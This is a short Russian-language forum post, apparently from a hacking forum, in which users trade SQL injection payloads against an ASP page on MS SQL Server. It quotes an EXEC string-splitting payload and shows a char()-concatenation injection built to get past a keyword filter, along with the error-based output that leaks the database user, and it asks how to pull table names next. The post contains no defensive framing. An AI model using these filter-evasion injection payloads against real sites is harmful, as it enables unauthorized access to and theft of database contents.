26.11.2008, 10:51
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941
Репутация:
2
|
|
Сообщение от [Raz0r]
';EXEC('SEL'+'ECT US'+'ER')--
Exec тоже под фильтром.
Я попробовал сделать так :
page.asp?id=-1+or+1=(char(0x73)%2bchar(0x65)%2bchar(0x6c)%2bcha r(0x65)%2bchar(0x63)%2bchar(0x74)%2bchar(0x7e)%2b+ user)--sp_password
Получил:
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'select~dbo' to data type int.
Если же попробовать к примеру top 1 table_name from .... , то тут уже нестыковка синтаксиса.
|
|
|